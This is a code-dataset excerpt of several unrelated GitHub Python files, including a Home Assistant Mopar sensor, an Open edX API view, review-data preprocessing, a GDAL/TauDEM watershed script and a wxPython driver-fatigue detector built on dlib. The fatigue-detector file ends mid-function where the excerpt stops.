enumerate(data.vehicles)], True)\n\n\nclass MoparData(object):\n \"\"\"Container for Mopar vehicle data.\n\n Prevents session expiry re-login race condition.\n \"\"\"\n\n def __init__(self, session):\n \"\"\"Initialize data.\"\"\"\n self._session = session\n self.vehicles = []\n self.vhrs = {}\n self.tow_guides = {}\n self.update()\n\n @Throttle(MIN_TIME_BETWEEN_UPDATES)\n def update(self, **kwargs):\n \"\"\"Update data.\"\"\"\n import motorparts\n _LOGGER.info(\"Updating vehicle data\")\n try:\n self.vehicles = motorparts.get_summary(self._session)['vehicles']\n except motorparts.MoparError:\n _LOGGER.exception(\"Failed to get summary\")\n return\n for index, _ in enumerate(self.vehicles):\n try:\n self.vhrs[index] = motorparts.get_report(self._session, index)\n 
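# the report and tow-guide lookups share one try block, so a failure in either logs the warning below and skips this vehicle\n                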
self.tow_guides[index] = motorparts.get_tow_guide(\n self._session, index)\n except motorparts.MoparError:\n _LOGGER.warning(\"Failed to update for vehicle index %s\", index)\n\n\nclass MoparSensor(Entity):\n \"\"\"Mopar vehicle sensor.\"\"\"\n\n def __init__(self, data, index):\n \"\"\"Initialize the sensor.\"\"\"\n self._index = index\n self._vehicle = {}\n self._vhr = {}\n self._tow_guide = {}\n self._odometer = None\n self._data = data\n\n def update(self):\n \"\"\"Update device state.\"\"\"\n self._data.update()\n self._vehicle = self._data.vehicles[self._index]\n self._vhr = self._data.vhrs.get(self._index, {})\n self._tow_guide = self._data.tow_guides.get(self._index, {})\n if 'odometer' in self._vhr:\n odo = float(self._vhr['odometer'])\n self._odometer = int(self.hass.config.units.length(\n odo, LENGTH_KILOMETERS))\n\n @property\n def name(self):\n \"\"\"Return the name of the sensor.\"\"\"\n return '{} {} {}'.format(\n self._vehicle['year'], self._vehicle['make'],\n self._vehicle['model'])\n\n @property\n def state(self):\n \"\"\"Return the state of the sensor.\"\"\"\n return self._odometer\n\n @property\n def device_state_attributes(self):\n \"\"\"Return the state attributes.\"\"\"\n import motorparts\n attributes = {\n ATTR_VEHICLE_INDEX: self._index,\n ATTR_ATTRIBUTION: motorparts.ATTRIBUTION\n }\n attributes.update(self._vehicle)\n attributes.update(self._vhr)\n attributes.update(self._tow_guide)\n return attributes\n\n @property\n def unit_of_measurement(self):\n \"\"\"Return the unit of measurement.\"\"\"\n return self.hass.config.units.length_unit\n\n @property\n def icon(self):\n \"\"\"Return the icon.\"\"\"\n return 'mdi:car'\n","repo_name":"jest-community/jest-pytest","sub_path":"src/__tests__/integration/home-assistant/homeassistant/components/sensor/mopar.py","file_name":"mopar.py","file_ext":"py","file_size_in_byte":5010,"program_lang":"python","lang":"en","doc_type":"code","stars":40,"dataset":"github-code","pt":"75"} +{"seq_id":"27271090132","text":"from rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.exceptions import APIException, ParseError\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom openedx.core.djangoapps.schedules.utils import reset_self_paced_schedule\n\n\nclass UnableToResetDeadlines(APIException):\n status_code = 400\n default_detail = 'Unable to reset deadlines.'\n default_code = 'unable_to_reset_deadlines'\n\n\n@permission_classes((IsAuthenticated,))\n@api_view(['POST'])\ndef reset_course_deadlines(request):\n course_key = request.data.get('course_key', None)\n\n # If body doesnt contain 'course_key', return 400 to client.\n if not course_key:\n raise ParseError(\"'course_key' is required.\")\n\n # If body contains params other than 'course_key', return 400 to client.\n if len(request.data) > 1:\n raise ParseError(\"Only 'course_key' is expected.\")\n\n try:\n reset_self_paced_schedule(request.user, course_key)\n return Response({'message': 'Deadlines successfully reset.'})\n except Exception:\n raise UnableToResetDeadlines\n","repo_name":"JimmyKosgei/jimmykkedx","sub_path":"openedx/features/course_experience/api/v1/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1136,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"29541743422","text":"import json\r\nimport gzip\r\nimport array\r\nimport numpy as np\r\n#数据处理第二步,根据5-core的评论生成rating的csv文件\r\n\r\ndef parse(path):\r\n g = 
gzip.open(path, 'r')\r\n    for l in g:\r\n        # each line of the 5-core dump is a Python dict literal, so eval() is used to parse it\r\n        yield eval(l)\r\n\r\ndef readImageAsin(path):\r\n    f = open(path, 'rb')\r\n    try:\r\n        while True:\r\n            asin = f.read(10)\r\n            if not asin:  # read() returns b'' at end of file; comparing bytes with '' never matches\r\n                break\r\n            a = array.array('f')\r\n            a.fromfile(f, 4096)\r\n            yield asin\r\n    except EOFError:\r\n        pass\r\n\r\ncategory = 'Movies_and_TV'\r\nk_core = '_5'\r\nusers = []\r\nitems = []\r\nratings = []\r\ncount = 0\r\n\r\nfor review in parse(category + \"/reviews_\" + category + k_core + \".json.gz\"):\r\n    users.append(review['reviewerID'])\r\n    items.append(review['asin'])\r\n    ratings.append(review['overall'])\r\n    count += 1\r\ndata_amount = count\r\nprint('Read reviews over, data amount = ', data_amount)\r\n\r\nfrating = open(category + \"/ratings_\" + category + k_core + \".csv\", 'w')\r\nfor user, item, rating in zip(users, items, ratings):\r\n    frating.write(user + ',' + item + ',' + str(int(rating)) + '\\n')\r\nfrating.close()\r\n","repo_name":"XMUDM/Deamer","sub_path":"data_preprocess/generate_rating_5.py","file_name":"generate_rating_5.py","file_ext":"py","file_size_in_byte":1091,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"75"}
{"seq_id":"14970936017","text":"\"\"\"\nWrite a function that determines whether an array contains a pair\nof numbers that sum up to a certain integer and returns that pair\nI.e. 10, [3, 4, 1, 2, 8] -> (8, 2)\n\"\"\"\n\n\ndef contains_sum_of(number, array):\n    \"\"\"Algo: for every number, we know which number needs to be added\n    to reach the target sum. Iterate over the array, add every number to a dictionary,\n    and check whether the complementary number is already in the dictionary.\n    Complexity: O(n)\n    \"\"\"\n    pairs = []\n\n    # Dictionary of numbers already seen\n    numbers_seen = {}\n    for n in array:\n        summing_number = number - n\n        if summing_number in numbers_seen:\n            pairs.append((n, summing_number))\n        else:\n            numbers_seen[n] = 1\n\n    return pairs if pairs else None\n\nprint(contains_sum_of(10, [3, 4, 1, 2, 2, 5, 5, 8]))\n\nprint(contains_sum_of(10, [3, 4]))\n","repo_name":"ssarber/PythonClass","sub_path":"algorithms/two_number_sum.py","file_name":"two_number_sum.py","file_ext":"py","file_size_in_byte":888,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"}
{"seq_id":"27160407317","text":"from osgeo import gdal, ogr\nimport subprocess\n\n#Variables\nOutlets = './static/uploads/Outlet.shp'\nBasin = './static/uploads/Basin.shp'\nSource = './static/uploads/Source.shp'\n\ndef ContaminationFlow():\n    \n    BASINang = './static/uploads/BASINang.tif'\n    BASINdm = './static/uploads/BASINdm.tif'\n    SourceR = './static/uploads/SourceR.tif'\n    BASINdg = './static/uploads/BASINdg.tif'\n    BASINctpt = './static/uploads/BASINctpt.tif'\n    BASINnet = './static/uploads/BASINsrcndCrop.tif'\n    ContamArea = './static/uploads/ContaminationAreas.tif'\n    R1 = './static/uploads/R1.tif'\n    R2 = './static/uploads/R2.tif'\n    R3 = './static/uploads/R3.tif'\n    ContamShp = './static/uploads/ContaminationAreas.shp'\n    \n    \n    raster = gdal.Open('./static/uploads/BASINang.tif')\n    gt = raster.GetGeoTransform()\n    pixelSizeX = gt[1]\n    pixelSizeY = -gt[5]\n    print(pixelSizeX)\n    print(pixelSizeY)\n    minx = gt[0]\n    maxy = gt[3]\n    maxx = minx + gt[1]*raster.RasterXSize\n    miny = maxy + gt[5]*raster.RasterYSize\n    print(minx, miny, maxx, maxy)\n    \n    # Generate contaminant flow - including fertilisers\n    #Rasterize Source\n    cmd1=\"gdal_rasterize -a id -tr '{0}' '{1}' -a_nodata 0.0 -te '{2}' '{3}' '{4}' '{5}' -ot Float32 -of GTiff '{6}' '{7}'\".format(pixelSizeX, 
pixelSizeY, minx, miny, maxx, maxy, Source, SourceR)\n subprocess.call(cmd1, shell=True)\n #Translate Source\n cmd2=\"gdal_translate -a_nodata -9999 -of GTiff '{0}' '{1}'\".format(SourceR, BASINdg)\n subprocess.call(cmd2, shell=True)\n #Rasterize Basin\n cmd3=\"gdal_rasterize -a fid -tr '{0}' '{1}' -a_nodata 0.0 -te '{2}' '{3}' '{4}' '{5}' -ot Float32 -of GTiff '{6}' '{7}'\".format(pixelSizeX, pixelSizeY, minx, miny, maxx, maxy, Basin, BASINdm) \n subprocess.call(cmd3, shell=True)\n #Execute contamination flow command\n cmd4 = \"mpiexec /usr/local/taudem/dinfconclimaccum -ang '{0}' -dg '{1}' -dm '{2}' -ctpt '{3}' -q '{4}' -csol 1 -o '{5}' -nc\".format(BASINang, BASINdg, BASINdm, BASINctpt, BASINdm, Outlets)\n subprocess.call(cmd4, shell=True)\n \n #Output Contamination Areas\n cmd5=\"gdal_translate -a_nodata -9999 -of GTiff '{0}' '{1}'\".format(BASINctpt, R1)\n subprocess.call(cmd5, shell=True)\n cmd6=\"gdalwarp -of GTiff -cutline '{0}' -crop_to_cutline '{1}' '{2}'\".format(Basin, R1, R2)\n subprocess.call(cmd6, shell=True)\n cmd7=\"gdal_translate -a_nodata -9999 -of GTiff '{0}' '{1}'\".format(R2, R3)\n subprocess.call(cmd7, shell=True)\n cmd8=\"gdal_calc.py --calc 'A*logical_not(A<0)' --format GTiff --type Float32 -A '{0}' --A_band 1 --outfile '{1}'\".format(R3, ContamArea)\n subprocess.call(cmd8, shell=True)\n cmd9=\"gdal_polygonize.py '{0}' -8 -b 1 -f 'ESRI Shapefile' '{1}'\".format(ContamArea, ContamShp)\n subprocess.call(cmd9, shell=True)\n \n shapefile = ogr.Open(ContamShp, 1)\n \n layer = shapefile.GetLayer()\n layer.SetAttributeFilter(\"DN = 0\")\n \n for feat in layer:\n print (feat.GetField(\"DN\"))\n layer.DeleteFeature(feat.GetFID())\n\n\nif __name__ == '__main__':\n\n ContaminationFlow()\n","repo_name":"jrc15/geomFlaskApp","sub_path":"FlaskApp/HydroContamination.py","file_name":"HydroContamination.py","file_ext":"py","file_size_in_byte":3058,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"19438509610","text":"# -*- coding: utf-8 -*-\r\nimport shutil\r\nimport dlib # 人脸识别的库dlib\r\nimport numpy as np # 数据处理的库numpy\r\nimport wx # 构造显示界面的GUI\r\nimport wx.xrc\r\nimport wx.adv\r\n# import the necessary packages\r\nfrom scipy.spatial import distance as dist\r\nfrom imutils.video import FileVideoStream\r\nfrom imutils.video import VideoStream\r\nfrom imutils import face_utils\r\nimport argparse\r\nimport imutils\r\nimport datetime, time\r\nimport math\r\nimport os\r\nimport pandas as pd\r\nimport winsound # 系统音效\r\nfrom playsound import playsound # 音频播放\r\nimport csv # 存入表格\r\nimport time\r\nimport sys\r\nimport numpy as np # 数据处理的库 numpy\r\nfrom cv2 import cv2 as cv2 # 图像处理的库 OpenCv\r\nimport pandas as pd # 数据处理的库 Pandas\r\nfrom skimage import io\r\nimport socket\r\nimport codecs\r\n## Class Fatigue_detecting\r\n###########################################################################\r\n\r\nCOVER = 'G:/pycharm project/python project/face detecting/images/camera.png'\r\n\r\n\r\nfacerec = dlib.face_recognition_model_v1(\r\n \"G:/pycharm project/python project/face detecting/model/dlib_face_recognition_resnet_model_v1.dat\")\r\n# 用来存放所有录入人脸特征的数组\r\n# the array to save the features of faces in the database\r\nfeatures_known_arr = []\r\n\r\ndetector = dlib.get_frontal_face_detector()\r\n\r\nface_rec = dlib.face_recognition_model_v1(\"G:/pycharm project/python project/face detecting/model/dlib_face_recognition_resnet_model_v1.dat\")\r\n\r\npredictor = dlib.shape_predictor(\"G:/pycharm project/python project/face 
detecting/model/shape_predictor_68_face_landmarks.dat\")\r\n\r\n\r\n# \"\"\"\r\n# client\r\n# connect()\r\n# recv()\r\n# send()\r\n# sendall()\r\n# \"\"\"\r\n# # create the socket and connect it to the sensor's IP and port\r\n# sk = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\r\n# # address = ('10.1.156.82', 8001)\r\n# sk.connect(('10.1.156.82', 8001))\r\n# inp = '030300000002c5e9'\r\n# while True:\r\n#     if inp == 'exit':\r\n#         print(\"exit\")\r\n#         break\r\n#     # the request payload is hex-encoded by default\r\n#     sk.send(codecs.decode(inp, 'hex'))\r\n#     # poll the sensor every 2 seconds\r\n#     time.sleep(2)\r\n#     # receive up to 1024 bytes per read\r\n#     result = sk.recv(1024)\r\n#     result = codecs.encode(result, 'hex')\r\n#     r = bytes(result).decode('utf-8')\r\n#     shidu = int(r[6:10], 16) / 100\r\n#     wendu = int(r[10:14], 16) / 100\r\n#     print(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\r\n#     print(\"temperature: %s, humidity: %s\\n\" % (wendu, shidu))\r\n# sk.close()  # kept commented out with the client above: sk is undefined at module level, so a live call would raise NameError on import\r\n\r\n\r\ndef return_128d_features(path_img):\r\n    im_rd = io.imread(path_img)\r\n    img_gray = cv2.cvtColor(im_rd, cv2.COLOR_BGR2RGB)\r\n    faces = detector(img_gray, 1)\r\n\r\n    print(\"%-40s %-20s\" % (\"image with faces detected:\", path_img), '\\n')\r\n\r\n    # a cropped face may fail re-detection, so only images in which a face\r\n    # is actually found are used to compute the descriptor\r\n    if len(faces) != 0:\r\n        shape = predictor(img_gray, faces[0])\r\n        face_descriptor = face_rec.compute_face_descriptor(img_gray, shape)\r\n    else:\r\n        face_descriptor = 0\r\n        print(\"no face\")\r\n\r\n    return face_descriptor\r\n\r\ndef return_features_mean_personX(path_faces_personX):\r\n    features_list_personX = []\r\n    photos_list = os.listdir(path_faces_personX)\r\n    if photos_list:\r\n        for i in range(len(photos_list)):\r\n            # call return_128d_features() to get the 128D descriptor\r\n            print(\"%-40s %-20s\" % (\"image to read:\", path_faces_personX + \"/\" + photos_list[i]))\r\n            features_128d = return_128d_features(path_faces_personX + \"/\" + photos_list[i])\r\n            # print(features_128d)\r\n            # skip images in which no face was detected\r\n            if features_128d == 0:\r\n                continue\r\n            features_list_personX.append(features_128d)\r\n    else:\r\n        print(\"Warning: No images in \" + path_faces_personX + '/', '\\n')\r\n\r\n    # average the descriptors\r\n    # N x 128D -> 1 x 128D\r\n    if features_list_personX:\r\n        features_mean_personX = np.array(features_list_personX).mean(axis=0)\r\n    else:\r\n        features_mean_personX = '0'\r\n\r\n    return features_mean_personX\r\npath_images_from_camera = \"G:/pycharm project/python project/face detecting/pictures/people/\"\r\nclass Fatigue_detecting(wx.Frame):\r\n\r\n    def __init__(self, parent, title):\r\n        wx.Frame.__init__(self, parent, id=wx.ID_ANY, title=title, pos=wx.DefaultPosition, size=wx.Size(873, 535),\r\n                          style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL)\r\n        # wx.Frame.__init__(self, parent, id=wx.ID_ANY, title=title, pos=wx.DefaultPosition, size=wx.Size(900, 700),style=wx.DEFAULT_FRAME_STYLE | wx.TAB_TRAVERSAL)\r\n        self.SetSizeHints(wx.DefaultSize, wx.DefaultSize)\r\n        self.SetBackgroundColour(wx.SystemSettings.GetColour(wx.SYS_COLOUR_MENU))\r\n\r\n        bSizer1 = wx.BoxSizer(wx.VERTICAL)\r\n        bSizer2 = wx.BoxSizer(wx.HORIZONTAL)\r\n        bSizer3 = wx.BoxSizer(wx.VERTICAL)\r\n\r\n        self.m_animCtrl1 = wx.adv.AnimationCtrl(self, wx.ID_ANY, wx.adv.NullAnimation, wx.DefaultPosition,\r\n                                                wx.DefaultSize, wx.adv.AC_DEFAULT_STYLE)\r\n        bSizer3.Add(self.m_animCtrl1, 1, wx.ALL | wx.EXPAND, 5)\r\n        bSizer2.Add(bSizer3, 9, wx.EXPAND, 5)\r\n        bSizer4 = wx.BoxSizer(wx.VERTICAL)\r\n        sbSizer1 = wx.StaticBoxSizer(wx.StaticBox(self, wx.ID_ANY, u\"parameters setting\"), wx.VERTICAL)\r\n        sbSizer2 = wx.StaticBoxSizer(wx.StaticBox(sbSizer1.GetStaticBox(), wx.ID_ANY, 
u\"video source\"), wx.VERTICAL)\r\n gSizer1 = wx.GridSizer(0, 2, 0, 8)\r\n m_choice1Choices = [u\"camera_0\", u\"camera_1\", u\"camera_2\"]\r\n self.m_choice1 = wx.Choice(sbSizer2.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.Size(90, 25),\r\n m_choice1Choices, 0)\r\n self.m_choice1.SetSelection(0)\r\n gSizer1.Add(self.m_choice1, 0, wx.ALL, 5)\r\n self.camera_button1 = wx.Button(sbSizer2.GetStaticBox(), wx.ID_ANY, u\"start detecting\", wx.DefaultPosition,\r\n wx.Size(90, 25), 0)\r\n gSizer1.Add(self.camera_button1, 0, wx.ALL, 5)\r\n self.vedio_button2 = wx.Button(sbSizer2.GetStaticBox(), wx.ID_ANY, u\"open video file\", wx.DefaultPosition,\r\n wx.Size(90, 25), 0)\r\n gSizer1.Add(self.vedio_button2, 0, wx.ALL, 5)\r\n\r\n self.off_button3 = wx.Button(sbSizer2.GetStaticBox(), wx.ID_ANY, u\"pause\", wx.DefaultPosition, wx.Size(90, 25), 0)\r\n gSizer1.Add(self.off_button3, 0, wx.ALL, 5)\r\n sbSizer2.Add(gSizer1, 1, wx.EXPAND, 5)\r\n sbSizer1.Add(sbSizer2, 2, wx.EXPAND, 5)\r\n\r\n self.information_button1 = wx.Button(sbSizer2.GetStaticBox(), wx.ID_ANY, u\"upload \",\r\n wx.DefaultPosition,\r\n wx.Size(90, 25), 0)\r\n gSizer1.Add(self.information_button1, 0, wx.ALL, 5)\r\n\r\n self.information_button2 = wx.Button(sbSizer2.GetStaticBox(), wx.ID_ANY, u\"update \",\r\n wx.DefaultPosition,\r\n wx.Size(90, 25), 0)\r\n gSizer1.Add(self.information_button2, 0, wx.ALL, 5)\r\n\r\n sbSizer3 = wx.StaticBoxSizer(wx.StaticBox(sbSizer1.GetStaticBox(), wx.ID_ANY, u\"fatigue detecting\"), wx.VERTICAL)\r\n bSizer5 = wx.BoxSizer(wx.HORIZONTAL)\r\n self.yawn_checkBox1 = wx.CheckBox(sbSizer3.GetStaticBox(), wx.ID_ANY, u\"yawning detecting\", wx.Point(-1, -1),\r\n wx.Size(-1, 15), 0)\r\n self.yawn_checkBox1.SetValue(True)\r\n bSizer5.Add(self.yawn_checkBox1, 0, wx.ALL, 5)\r\n self.blink_checkBox2 = wx.CheckBox(sbSizer3.GetStaticBox(), wx.ID_ANY, u\"blinking detecting\", wx.Point(-1, -1),\r\n wx.Size(-1, 15), 0)\r\n self.blink_checkBox2.SetValue(True)\r\n bSizer5.Add(self.blink_checkBox2, 0, wx.ALL, 5)\r\n sbSizer3.Add(bSizer5, 1, wx.EXPAND, 5)\r\n bSizer6 = wx.BoxSizer(wx.HORIZONTAL)\r\n self.nod_checkBox7 = wx.CheckBox(sbSizer3.GetStaticBox(), wx.ID_ANY, u\"nodding detecting\", wx.Point(-1, -1), wx.Size(-1, 15),\r\n 0)\r\n self.nod_checkBox7.SetValue(True)\r\n bSizer6.Add(self.nod_checkBox7, 0, wx.ALL, 5)\r\n self.m_staticText1 = wx.StaticText(sbSizer3.GetStaticBox(), wx.ID_ANY, u\"testing interval(s):\", wx.DefaultPosition,\r\n wx.Size(-1, 15), 0)\r\n self.m_staticText1.Wrap(-1)\r\n bSizer6.Add(self.m_staticText1, 0, wx.ALL, 5)\r\n m_listBox2Choices = [u\"3\", u\"4\", u\"5\", u\"6\", u\"7\", u\"8\"]\r\n self.m_listBox2 = wx.ListBox(sbSizer3.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.Size(50, 24),\r\n m_listBox2Choices, 0)\r\n bSizer6.Add(self.m_listBox2, 0, 0, 5)\r\n sbSizer3.Add(bSizer6, 1, wx.EXPAND, 5)\r\n sbSizer1.Add(sbSizer3, 2, 0, 5)\r\n sbSizer4 = wx.StaticBoxSizer(wx.StaticBox(sbSizer1.GetStaticBox(), wx.ID_ANY, u\"absences detecting\"), wx.VERTICAL)\r\n bSizer8 = wx.BoxSizer(wx.HORIZONTAL)\r\n self.m_checkBox4 = wx.CheckBox(sbSizer4.GetStaticBox(), wx.ID_ANY, u\"absences detecting\", wx.DefaultPosition, wx.Size(-1, 15),\r\n 0)\r\n self.m_checkBox4.SetValue(True)\r\n bSizer8.Add(self.m_checkBox4, 0, wx.ALL, 5)\r\n self.m_staticText2 = wx.StaticText(sbSizer4.GetStaticBox(), wx.ID_ANY, u\"absences interval(s):\", wx.DefaultPosition,\r\n wx.Size(-1, 15), 0)\r\n self.m_staticText2.Wrap(-1)\r\n bSizer8.Add(self.m_staticText2, 0, wx.ALL, 5)\r\n m_listBox21Choices = [u\"5\", u\"10\", u\"15\", u\"20\", 
u\"25\", u\"30\"]\r\n self.m_listBox21 = wx.ListBox(sbSizer4.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.Size(50, 24),\r\n m_listBox21Choices, 0)\r\n bSizer8.Add(self.m_listBox21, 0, 0, 5)\r\n sbSizer4.Add(bSizer8, 1, 0, 5)\r\n sbSizer1.Add(sbSizer4, 1, 0, 5)\r\n #sbSizer5 = wx.StaticBoxSizer(wx.StaticBox(sbSizer1.GetStaticBox(), wx.ID_ANY, u\"analysis area\"), wx.VERTICAL)\r\n bSizer9 = wx.BoxSizer(wx.HORIZONTAL)\r\n #self.m_staticText3 = wx.StaticText(sbSizer5.GetStaticBox(), wx.ID_ANY, u\"analysis area: \", wx.DefaultPosition,\r\n #wx.DefaultSize, 0)\r\n #self.m_staticText3.Wrap(-1)\r\n #bSizer9.Add(self.m_staticText3, 0, wx.ALL, 5)\r\n #m_choice2Choices = [u\"full screen\", u\"part of screen\"]\r\n #self.m_choice2 = wx.Choice(sbSizer5.GetStaticBox(), wx.ID_ANY, wx.DefaultPosition, wx.DefaultSize,\r\n #m_choice2Choices, 0)\r\n #self.m_choice2.SetSelection(0)\r\n #bSizer9.Add(self.m_choice2, 0, wx.ALL, 5)\r\n #sbSizer5.Add(bSizer9, 1, wx.EXPAND, 5)\r\n #sbSizer1.Add(sbSizer5, 1, 0, 5)\r\n sbSizer6 = wx.StaticBoxSizer(wx.StaticBox(sbSizer1.GetStaticBox(), wx.ID_ANY, u\"status output\"), wx.VERTICAL)\r\n self.m_textCtrl3 = wx.TextCtrl(sbSizer6.GetStaticBox(), wx.ID_ANY, wx.EmptyString, wx.DefaultPosition,\r\n wx.DefaultSize, wx.TE_MULTILINE | wx.TE_READONLY)\r\n sbSizer6.Add(self.m_textCtrl3, 1, wx.ALL | wx.EXPAND, 5)\r\n sbSizer1.Add(sbSizer6, 5, wx.EXPAND, 5)\r\n bSizer4.Add(sbSizer1, 1, wx.EXPAND, 5)\r\n bSizer2.Add(bSizer4, 3, wx.EXPAND, 5)\r\n bSizer1.Add(bSizer2, 1, wx.EXPAND, 5)\r\n\r\n self.SetSizer(bSizer1)\r\n self.Layout()\r\n self.Centre(wx.BOTH)\r\n\r\n # Connect Events\r\n self.m_choice1.Bind(wx.EVT_CHOICE, self.cameraid_choice) # 绑定事件\r\n self.camera_button1.Bind(wx.EVT_BUTTON, self.camera_on) # 开\r\n self.vedio_button2.Bind(wx.EVT_BUTTON, self.vedio_on)\r\n self.off_button3.Bind(wx.EVT_BUTTON, self.off) # 关\r\n self.information_button1.Bind(wx.EVT_BUTTON, self.upload)\r\n self.information_button2.Bind(wx.EVT_BUTTON, self.update)\r\n\r\n self.m_listBox2.Bind(wx.EVT_LISTBOX, self.AR_CONSEC_FRAMES) # 闪烁阈值设置\r\n self.m_listBox21.Bind(wx.EVT_LISTBOX, self.OUT_AR_CONSEC_FRAMES) # 脱岗时间设置\r\n\r\n # 封面图片\r\n self.image_cover = wx.Image(COVER, wx.BITMAP_TYPE_ANY)\r\n # 显示图片在m_animCtrl1上\r\n self.bmp = wx.StaticBitmap(self.m_animCtrl1, -1, wx.Bitmap(self.image_cover))\r\n\r\n # 设置窗口标题的图标\r\n self.icon = wx.Icon('./images/123.ico', wx.BITMAP_TYPE_ICO)\r\n self.SetIcon(self.icon)\r\n # 系统事件\r\n self.Bind(wx.EVT_CLOSE, self.OnClose)\r\n print(\"wxpython interface initialization is complete!\")\r\n \"\"\"参数\"\"\"\r\n # 默认为摄像头0\r\n self.VIDEO_STREAM = 0\r\n self.CAMERA_STYLE = False # False未打开摄像头,True摄像头已打开\r\n # 闪烁阈值(秒)\r\n self.AR_CONSEC_FRAMES_check = 3\r\n self.OUT_AR_CONSEC_FRAMES_check = 5\r\n # 眼睛长宽比\r\n self.EYE_AR_THRESH = 0.2\r\n self.EYE_AR_CONSEC_FRAMES = self.AR_CONSEC_FRAMES_check\r\n # 打哈欠长宽比\r\n self.MAR_THRESH = 0.5\r\n self.MOUTH_AR_CONSEC_FRAMES = self.AR_CONSEC_FRAMES_check\r\n # 瞌睡点头\r\n self.HAR_THRESH = 0.3\r\n self.NOD_AR_CONSEC_FRAMES = self.AR_CONSEC_FRAMES_check\r\n\r\n \"\"\"计数\"\"\"\r\n # 初始化帧计数器和眨眼总数\r\n self.COUNTER = 0\r\n self.TOTAL = 0\r\n # 初始化帧计数器和打哈欠总数\r\n self.mCOUNTER = 0\r\n self.mTOTAL = 0\r\n # 初始化帧计数器和点头总数\r\n self.hCOUNTER = 0\r\n self.hTOTAL = 0\r\n # 离职时间长度\r\n self.oCOUNTER = 0\r\n\r\n \"\"\"姿态\"\"\"\r\n # 世界坐标系(UVW):填写3D参考点,该模型参考http://aifi.isr.uc.pt/Downloads/OpenGL/glAnthropometric3DModel.cpp\r\n self.object_pts = np.float32([[6.825897, 6.760612, 4.402142], # 33左眉左上角\r\n [1.330353, 7.122144, 6.903745], # 29左眉右角\r\n [-1.330353, 
7.122144, 6.903745], # 34右眉左角\r\n [-6.825897, 6.760612, 4.402142], # 38右眉右上角\r\n [5.311432, 5.485328, 3.987654], # 13左眼左上角\r\n [1.789930, 5.393625, 4.413414], # 17左眼右上角\r\n [-1.789930, 5.393625, 4.413414], # 25右眼左上角\r\n [-5.311432, 5.485328, 3.987654], # 21右眼右上角\r\n [2.005628, 1.409845, 6.165652], # 55鼻子左上角\r\n [-2.005628, 1.409845, 6.165652], # 49鼻子右上角\r\n [2.774015, -2.080775, 5.048531], # 43嘴左上角\r\n [-2.774015, -2.080775, 5.048531], # 39嘴右上角\r\n [0.000000, -3.116408, 6.097667], # 45嘴中央下角\r\n [0.000000, -7.415691, 4.070434]]) # 6下巴角\r\n\r\n # 相机坐标系(XYZ):添加相机内参\r\n self.K = [6.5308391993466671e+002, 0.0, 3.1950000000000000e+002,\r\n 0.0, 6.5308391993466671e+002, 2.3950000000000000e+002,\r\n 0.0, 0.0, 1.0] # 等价于矩阵[fx, 0, cx; 0, fy, cy; 0, 0, 1]\r\n # 图像中心坐标系(uv):相机畸变参数[k1, k2, p1, p2, k3]\r\n self.D = [7.0834633684407095e-002, 6.9140193737175351e-002, 0.0, 0.0, -1.3073460323689292e+000]\r\n\r\n # 像素坐标系(xy):填写凸轮的本征和畸变系数\r\n self.cam_matrix = np.array(self.K).reshape(3, 3).astype(np.float32)\r\n self.dist_coeffs = np.array(self.D).reshape(5, 1).astype(np.float32)\r\n\r\n # 重新投影3D点的世界坐标轴以验证结果姿势\r\n self.reprojectsrc = np.float32([[10.0, 10.0, 10.0],\r\n [10.0, 10.0, -10.0],\r\n [10.0, -10.0, -10.0],\r\n [10.0, -10.0, 10.0],\r\n [-10.0, 10.0, 10.0],\r\n [-10.0, 10.0, -10.0],\r\n [-10.0, -10.0, -10.0],\r\n [-10.0, -10.0, 10.0]])\r\n # 绘制正方体12轴\r\n self.line_pairs = [[0, 1], [1, 2], [2, 3], [3, 0],\r\n [4, 5], [5, 6], [6, 7], [7, 4],\r\n [0, 4], [1, 5], [2, 6], [3, 7]]\r\n\r\n def __del__(self):\r\n pass\r\n\r\n def get_head_pose(self, shape): # 头部姿态估计\r\n # (像素坐标集合)填写2D参考点,注释遵循https://ibug.doc.ic.ac.uk/resources/300-W/\r\n # 17左眉左上角/21左眉右角/22右眉左上角/26右眉右上角/36左眼左上角/39左眼右上角/42右眼左上角/\r\n # 45右眼右上角/31鼻子左上角/35鼻子右上角/48左上角/54嘴右上角/57嘴中央下角/8下巴角\r\n image_pts = np.float32([shape[17], shape[21], shape[22], shape[26], shape[36],\r\n shape[39], shape[42], shape[45], shape[31], shape[35],\r\n shape[48], shape[54], shape[57], shape[8]])\r\n # solvePnP计算姿势——求解旋转和平移矩阵:\r\n # rotation_vec表示旋转矩阵,translation_vec表示平移矩阵,cam_matrix与K矩阵对应,dist_coeffs与D矩阵对应。\r\n _, rotation_vec, translation_vec = cv2.solvePnP(self.object_pts, image_pts, self.cam_matrix, self.dist_coeffs)\r\n # projectPoints重新投影误差:原2d点和重投影2d点的距离(输入3d点、相机内参、相机畸变、r、t,输出重投影2d点)\r\n reprojectdst, _ = cv2.projectPoints(self.reprojectsrc, rotation_vec, translation_vec, self.cam_matrix,\r\n self.dist_coeffs)\r\n reprojectdst = tuple(map(tuple, reprojectdst.reshape(8, 2))) # 以8行2列显示\r\n\r\n # 计算欧拉角calc euler angle\r\n # 参考https://docs.opencv.org/2.4/modules/calib3d/doc/camera_calibration_and_3d_reconstruction.html#decomposeprojectionmatrix\r\n rotation_mat, _ = cv2.Rodrigues(rotation_vec) # 罗德里格斯公式(将旋转矩阵转换为旋转向量)\r\n pose_mat = cv2.hconcat((rotation_mat, translation_vec)) # 水平拼接,vconcat垂直拼接\r\n # decomposeProjectionMatrix将投影矩阵分解为旋转矩阵和相机矩阵\r\n _, _, _, _, _, _, euler_angle = cv2.decomposeProjectionMatrix(pose_mat)\r\n\r\n pitch, 